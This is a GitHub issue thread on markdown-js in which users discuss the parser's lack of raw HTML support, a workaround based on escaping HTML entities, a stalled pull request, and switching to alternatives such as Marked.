It'd be nice to have an update on this issue. I ran into it myself but side-stepped it for now by escaping HTML on the way into the Markdown parser. So > would end up as &amp;gt; and I'd replace those in the content that comes back out. Not the nicest route to take, but I didn't want to muck around with the module itself (for what I was working on).

Ignore my workaround, it didn't allow for code snippets :-(

from markdown-js.

kevinSuttle avatar kevinSuttle commented on July 19, 2024

Yeah I'm just noticing the entity substitution also. Not the biggest deal since a lot of browsers know what it means, and render it accordingly, but still, it'd be nice.

from markdown-js.

codingisacopingstrategy avatar codingisacopingstrategy commented on July 19, 2024

For those asking for updates, there have been a number of pull requests, the most recent of which is #98

from markdown-js.

adam-stokes avatar adam-stokes commented on July 19, 2024

I wouldn't hold your breath; it doesn't look like the maintainer is planning on doing anything at all.

from markdown-js.

codingisacopingstrategy avatar codingisacopingstrategy commented on July 19, 2024

From the threads I get the impression that this functionality is not really near to the heart of the maintainer, but they haven’t explicitly said they’ll refuse pull requests… The linked pull request is still open…

I asked for a comment on what is blocking the pull request, so that we know if there is a way to help out.

cheers,

from markdown-js.

axefrog avatar axefrog commented on July 19, 2024

Guys, there are better alternatives nowadays anyway:
Marked: https://github.com/chjj/marked
MarkdownDeep: http://www.toptensoftware.com/markdowndeep/ / https://www.npmjs.org/package/markdowndeep
Both support HTML and have plenty of great features

from markdown-js.

codingisacopingstrategy avatar codingisacopingstrategy commented on July 19, 2024

That depends on what you are looking for; for a project we needed to extend Markdown with a new dialect, and this was much easier to do in markdown-js than in marked, for example. I’d still be really happy with an HTML-supporting markdown.js

from markdown-js.

foolyoghurt avatar foolyoghurt commented on July 19, 2024

@axefrog Thanks for sharing. Marked is awesome!

from markdown-js.

luishdez avatar luishdez commented on July 19, 2024

I agree with the other comments: this parser should not be aware of things like XSS. That's the developer's problem and should be handled by other parts of the application (that's obvious).

Moving to marked too

from markdown-js.
